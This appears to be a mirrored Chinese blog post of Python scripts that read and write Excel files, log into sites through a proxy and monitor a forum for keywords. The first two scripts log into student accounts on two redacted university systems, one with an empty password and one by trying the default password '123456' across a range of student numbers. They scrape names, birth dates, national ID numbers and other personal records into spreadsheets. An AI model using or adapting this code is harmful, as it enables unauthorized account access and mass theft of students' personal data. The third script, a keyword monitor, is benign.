py读写Excel模拟登陆代理爬取

2014-09-22 Golmic 更多博文 » 博客 » GitHub »

python 爬虫 模拟登陆 代理 读写Excel

原文链接 http://code.lujq.me/2014/09/22/py%E8%AF%BB%E5%86%99Excel%E6%A8%A1%E6%8B%9F%E7%99%BB%E9%99%86%E4%BB%A3%E7%90%86%E7%88%AC%E5%8F%96/
注:以下为加速网络访问所做的原文缓存,经过重新格式化,可能存在格式方面的问题,或偶有遗漏信息,请以原文为准。


下列代码全部基于python3.4

<!--more-->

# --- Script 1: log in to a student portal through a local proxy and scrape
# --- per-student profile data into numbered .xls files. Python 3.4, with
# --- third-party xlrd (read) and xlwt3 (write).
import urllib.parse,urllib.request,http.cookiejar,os,xlrd,xlwt3,time,random
print ("########   确保关闭了所有的EXCEL,运行时不要打开任何EXCEL文件 ########")
# Task list: column 0 of read.xls / Sheet1 holds the student numbers to fetch.
rfile = xlrd.open_workbook('read.xls')  
rfile.sheet_names()
rsheet = rfile.sheet_by_name(u'Sheet1')
# Result files are named 0.xls, 1.xls, ...; probe for the first unused number.
resultfilenum = 0
result = str(resultfilenum)+".xls"
i = 0
if os.path.exists(result):
    # Previous results exist: find the newest file and resume after the last
    # student number it recorded.
    while os.path.exists(result):
        resultfilenum += 1
        result = str(resultfilenum)+".xls"
    # Step back to the last file that actually exists.
    resultfilenum -= 1
    result = str(resultfilenum)+".xls"
    wfile = xlrd.open_workbook(result)
    wfile.sheet_names()
    wsheet = wfile.sheet_by_name(u'Sheet1')
    # Last student number written by the previous run.
    lasttask = wsheet.col_values(0)[-1]
    # Advance i just past that entry so the main loop resumes there.
    for schnum in rsheet.col_values(0):
        i += 1
        if schnum == lasttask :
            break
else :
    # No previous results: pre-decrement to compensate for the unconditional
    # resultfilenum += 1 that follows, so the first run writes 0.xls.
    resultfilenum -= 1
# Fresh output workbook for this run; its number is one past the newest
# existing result file.
wfile = xlwt3.Workbook()
wsheet = wfile.add_sheet('Sheet1')
resultfilenum += 1
result = str(resultfilenum)+".xls"
# HTTP plumbing: session cookie jar, basic-auth handler, and a local HTTP
# proxy at 127.0.0.1:8087 that all requests are routed through.
cookie = http.cookiejar.CookieJar() 
cookieProc = urllib.request.HTTPCookieProcessor(cookie) 
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo,cookieProc)
urllib.request.install_opener(opener)      
# Request headers for the portal (host/referer redacted in the published post).
headers = {
    'User-Agent':'IE 6.0',
    'Host':'www.*******.***************',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer':'http://www.*******.***************/login',
    'Cookie':'JSESSIONID=8D46BD035D5B6AC1C443211A21245A27',
    'Connection':'keep-alive'
}
fail = 0    # NOTE(review): never used afterwards
k = 0       # iteration counter for progress messages
namer = 0   # name scraped in the previous iteration (duplicate detection)
print ("###############   程序初始化完成    ##########")
# Optional early-stop count; 0 means run through the whole task list.
#stop = int(input("输入运行几次后停止(0是一直循环下去): "))
stop = 0
for schnum in rsheet.col_values(0)[i:]:
    k += 1
    postdata=urllib.parse.urlencode({
        "contextPath":'',
        'contextName':'*******LoginPage',
        'contextPara':'null',
        'sectionName':'login',
        'itemName':'loginAction',
    'controlType':'frame',
    'login_strLoginName':schnum,
    "login_strPassword":''
    }).encode(encoding='UTF8')
    #发送给服务器的数据准备完毕
    log = urllib.request.Request(
        url = 'http://www.*******.***************/bsuims/bsMainFrameInit.do?',
        data = postdata,
        headers = headers
    )
    login = urllib.request.urlopen(log).read().decode("utf-8")
    #发送POST请求传输数据,登陆成功
    info1 = urllib.request.Request(
        url = 'http://www.*******.***************/person/stuinfo_personInfoShow.do?personId=119937&admin=0&accessType=&visualType=1'
    )
    info1 = urllib.request.urlopen(info1).read().decode("utf-8")
    info2 = urllib.request.Request(
        url = 'http://www.*******.***************/person/stuinfo_stuTrainShow.do'
    )
    info2 = urllib.request.urlopen(info2).read().decode("utf-8")
    if info1[240:250] ==  'tml; chars' : 
        order1 = [0 for j in range(27)]
        order2 = [0 for j in range(27)]
        for j in range (1,27):
            order1[j] = info1.find('</td>',order1[j-1]+1)
            order2[j] = info2.find('</td>',order2[j-1]+1)
        name = info1[info1.find('<td width="25%">')+25:order1[3]-8]
        if (name == namer):
            print('与上一个相同')
            continue
        namer = name
        ename = info1[order1[4]+37:order1[5]-8].strip()
        photoid = info1[info1.find('personId=',order1[5])+9:info1.find('&photoType')]
        schoolnum = info1[info1.find('<td width="20%">')+25:order1[8]-8].strip()
        if str(schoolnum) != str(schnum) :
            print("在第"+str(k)+"次执行时循环变量与中间检测结果不符!程序已经终止,检查一下错……")
            print("错误学号是:"+str(schnum),schoolnum)
            break
        if info1.find('女') > 0 :sex = '女'
        if info1.find('男') > 0 :sex = '男'
        nation = info1[info1.find('<td width="20%">',order1[15])+25:order1[16]-8]
        brith = info1[info1.find('<td height="25" width="35%">',order1[21])+37:order1[22]-8]
        idnum = info1[info1.find('<td>',order1[25])+13:order1[26]-8]
        admissionnum = info2[info2.find('<td width="28%">')+25:order2[3]-8]
        oversea = info2[info2.find('<td>',order2[6])+22:order2[7]-8]
        brave = info2[info2.find('<td>',order2[8])+22:order2[9]-8]
        college = info2[info2.find('<td>',order2[10])+13:order2[11]-8]
        major = info2[info2.find('<td>',order2[14])+13:order2[15]-8]
        clas = info2[info2.find('<td>',order2[18])+13:order2[19]-8]
        campus = info2[info2.find('<td>',order2[20])+13:order2[21]-8]
        degree = info2[info2.find('<td>',order2[22])+13:order2[23]-8]
        wsheet.write(i,0,schnum)
        wsheet.write(i,1,name)
#        wsheet.write(i,2,sex)
        wsheet.write(i,3,brith)
        wsheet.write(i,4,college)
        wsheet.write(i,5,major)
        wsheet.write(i,6,clas)
        wsheet.write(i,7,campus)
        wsheet.write(i,8,degree)
        wsheet.write(i,9,idnum)
        wsheet.write(i,10,nation)
        wsheet.write(i,11,oversea)
        wsheet.write(i,12,brave)
        wsheet.write(i,13,admissionnum)
        wsheet.write(i,14,ename)
        imgurl="http://www.*******.***************/person/stuinfo_downloadPhoto.do?personId="+str(photoid)+"&photoType=02"
#        imgname=str(sex)+str(schnum)+str(name)+'.jpg'
        imgname= str(schnum)+str(name)+'.jpg'
#        urllib.request.urlretrieve(imgurl,imgname)
    elif info1[240:250] ==  'eturnlogin':  
        print('登录失败')
    else:
        print ("尝试登陆后得到的结果已经在上面打印,与预期不符,程序已经终止,检查错误吧")
        break
    wfile.save(result)
    print ('第%d个已经完成'%(k))
    i += 1
    if k == stop :
        break
#wfile.save(result)
print ('##############################     任务执行完毕        ########################')
print ("本次任务文件保存为 : "+result)
# --- Script 2: enumerate a student-number range on a second system and dump
# --- each existing student's registry page into a numbered .xls file.
import urllib.parse,urllib.request,http.cookiejar,os,xlrd,xlwt3,time
def deal(info: str, i: int) -> None:
    """Parse one registry page *info* and write it as row *i* of the sheet.

    Relies on module globals: ``schnum`` (expected student number),
    ``wsheet``/``wfile``/``result`` (output workbook state). Fields are
    sliced out of the HTML at fixed offsets from '<p align="center">' tags.
    """
    # o[j] = position just past the j-th '<p align="center">' anchor.
    o = [0 for j in range(61)]
    for j in range (1,61):
            o[j] = info.find('<p align="center">',o[j-1])+18
    imgurl = info[info.find('<p><img src=')+13:info.find('" ></p>')]
    schoolnum = info[o[2]:o[2]+12]
    # Guard: the page must belong to the requested student number.
    if (int(schoolnum) != schnum):
        print(str(schnum)+'  ++++不存在++++ '+schoolnum)
        return
    # Each field is the text between its anchor and the next '<'.
    name = info[o[4]:info.find('<',o[4])]
    sex = info[o[8]:info.find('<',o[8])]
    birth = info[o[10]:info.find('<',o[10])]
    jiguan = info[o[14]:info.find('<',o[14])]
    mianmao = info[o[16]:info.find('<',o[16])]
    leibie =  info[o[20]:info.find('<',o[20])]
    college = info[o[22]:info.find('<',o[22])]
    major = info[o[28]:info.find('<',o[28])]
    lang = info[o[30]:info.find('<',o[30])]
    kaoqu = info[o[32]:info.find('<',o[32])]
    midsch = info[o[34]:info.find('<',o[34])]
    goal = info[o[36]:info.find('<',o[36])]
  #  print(imgurl)
   # print(schoolnum)
    print(schnum,name)
  #  print(sex)
  #  print(birth)
 #   print(jiguan)
  #  print(mianmao)
 #   print(leibie)
  #  print(college)
 #   print(major)
  #  print(lang)
  #  print(kaoqu)
  #  print(midsch)
 #   print(goal)
    # One row per student; save immediately so progress survives a crash.
    wsheet.write(i,0,schoolnum)
    wsheet.write(i,1,name)
    wsheet.write(i,2,sex)
    wsheet.write(i,3,birth)
    wsheet.write(i,4,jiguan)
    wsheet.write(i,5,mianmao)
    wsheet.write(i,6,leibie)
    wsheet.write(i,7,college)
    wsheet.write(i,8,major)
    wsheet.write(i,9,lang)
    wsheet.write(i,10,kaoqu)
    wsheet.write(i,11,midsch)
    wsheet.write(i,12,goal)
    wsheet.write(i,13,imgurl)
    wfile.save(result)
# Same numbered-result-file scheme as script 1: find the first unused N.xls.
resultfilenum = 0
result = str(resultfilenum)+".xls"
i = 0   # output row index
k = 0   # count of "student number does not exist" responses
l = 0 
if os.path.exists(result):
    while os.path.exists(result):
        resultfilenum += 1
        result = str(resultfilenum)+".xls"
    resultfilenum -= 1
    result = str(resultfilenum)+".xls"
    # NOTE(review): this workbook/sheet is opened but never read here, and is
    # unconditionally overwritten below — dead code carried over from script 1.
    wfile = xlrd.open_workbook(result)
    wfile.sheet_names()
    wsheet = wfile.sheet_by_name(u'Sheet1')
else :
    # Compensate for the unconditional += 1 below so the first run writes 0.xls.
    resultfilenum -= 1
wfile = xlwt3.Workbook()
wsheet = wfile.add_sheet('Sheet1')
resultfilenum += 1
result = str(resultfilenum)+".xls"
# Session cookies + basic auth + local proxy at 127.0.0.1:8087.
cookie = http.cookiejar.CookieJar() 
cookieProc = urllib.request.HTTPCookieProcessor(cookie) 
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo,cookieProc)
urllib.request.install_opener(opener)
# Headers for the second system (host redacted in the published post).
headers = {
    'User-Agent':'IE 6.0',
    'Host':'*********:7890',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer':'http://*********:7890/zhxt_bks/xk_login.html',
    'Cookie':'ACCOUNT=73654',
    'Connection':'keep-alive'
}
#for schnum in rsheet.col_values(0)[i:]:
####################################################################
####################################################################
# First/last student number of the range to enumerate. The actual values were
# redacted (asterisks) when the post was published — not valid Python as-is.
start = ******************
end =  ******************
####################################################################
####################################################################
print ('程序初始化完成,将获取[%d]到[%d]的信息'%(start,end))
# Try every student number in [start, end) with the default password, classify
# the login outcome, and dump each existing student's registry page via deal().
for schnum in range (start,end):
#    schnum = int(schnum)
    # Login form payload; this system is GBK-encoded throughout.
    postdata=urllib.parse.urlencode({
        'stuid':str(schnum),
        'pwd':'123456'  
    }).encode(encoding='gbk')
    log = urllib.request.Request(
        url = 'http://*********:7890/pls/wwwbks/bks_login2.login',
        data = postdata,
        headers = headers
    )
    login = urllib.request.urlopen(log).read()
    # The status page tells us whether the login attempt worked.
    cheak = urllib.request.Request(
        url = 'http://*********:7890/pls/wwwbks/bks_login2.loginmessage'
    )
    cheak = urllib.request.urlopen(cheak).read().decode('gbk')
    if ('请先登录再使用!!!' in cheak):
         print(str(schnum)+'  失败')
  #       wsheet.write(l,15,schnum)
 #        l += 1
#         wfile.save(result)
    elif ('你输入了错误的学号或密码' in cheak):
        print(str(schnum)+'  不存在')
        k += 1
        # 20 consecutive missing numbers: assume we ran off the end of the range.
        if ( k == 20 ):
            print('连续20个不存在')
            break
    elif ('登录成功!' in cheak ):
        # BUG FIX: k was never reset on a successful login, so the check above
        # counted *cumulative* misses while its message claims 连续 (consecutive)
        # ones. Reset the streak on every hit.
        k = 0
        info = urllib.request.Request(
            url = 'http://*********:7890/pls/wwwbks/bks_xj.xjcx'
        )
        info = urllib.request.urlopen(info).read().decode('gbk')
        # Probe characters 200..210 to confirm the registry page rendered.
        if (info[200:210] == 't language'):
            deal(info,i)
            i += 1
    else:
        # Unexpected response: dump it and stop for manual inspection.
        print(cheak)
        print(str(schnum)+'检查看看这是怎么了。')
        break
print('文件保存为'+result)

监控关键词

# --- Script 3: poll a forum page and raise an alert when a watched keyword
# --- appears in a thread that has not been seen before.
import urllib.request,os,time
# Already-seen whitelists: thread URLs (al) and titles (alt) that must not
# trigger another alert (contents redacted in the published post).
al = [
    "http://*****************.html",
    ]
alt = ["****************",
       ]
def find(a):
    """Locate keyword *a* inside the fetched page text (global ``f``), recover
    the surrounding thread title and URL, and alert unless either is already
    whitelisted in ``al``/``alt``."""
    hit = f.find(a)
    # Title = text between the nearest enclosing tags around the hit.
    open_end = f[:hit].rfind(">")+1
    close_start = f.find("<",hit)
    title = f[open_end:close_start]
    # Rebuild the thread URL from the "data...html" fragment preceding the hit.
    frag_start = f[:open_end].rfind("data")
    frag_end = f[:hit].rfind("html")
    url = "http://******.com/htm_"+f[frag_start:frag_end]+"html"
    if url in al or title in alt:
        # Already seen: just echo the title, no alert.
        print(title)
        return
    print("标题:"+title)
    print(url)
    os.system('cmd')     # pop a console window as the alert
    time.sleep(80)       # pause so the alert is not repeated immediately
# Route all requests through the local proxy at 127.0.0.1:8087.
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo)
urllib.request.install_opener(opener)
# Keywords to watch for; i counts consecutive fetch failures for back-off.
li = ["关键词1","关键词2","关键词3"]
i = 0
# Poll the page forever; on every pass scan it for each watched keyword.
while 1 :
    # Retry the fetch until it succeeds.
    while 1:
        try:
            # Slice off the fixed-size boilerplate header/footer of the page.
            f = urllib.request.urlopen('http://**************************').read().decode("gbk")[14800:-2400]
            break
        except Exception:  # narrowed from bare `except:` so Ctrl-C still exits
            print("失败")
            i+=1
            # BUG FIX: was `i / 5 == 0`, which under true division is never 0
            # for i >= 1, so the alert/back-off branch was unreachable. Fire it
            # on every 5th failure instead.
            if (i % 5 == 0):
                os.system('cmd')   # pop a console as an alert
                time.sleep(150)    # back off before retrying
    for a in li:
        if (a in f):
            find(a)
    time.sleep(50)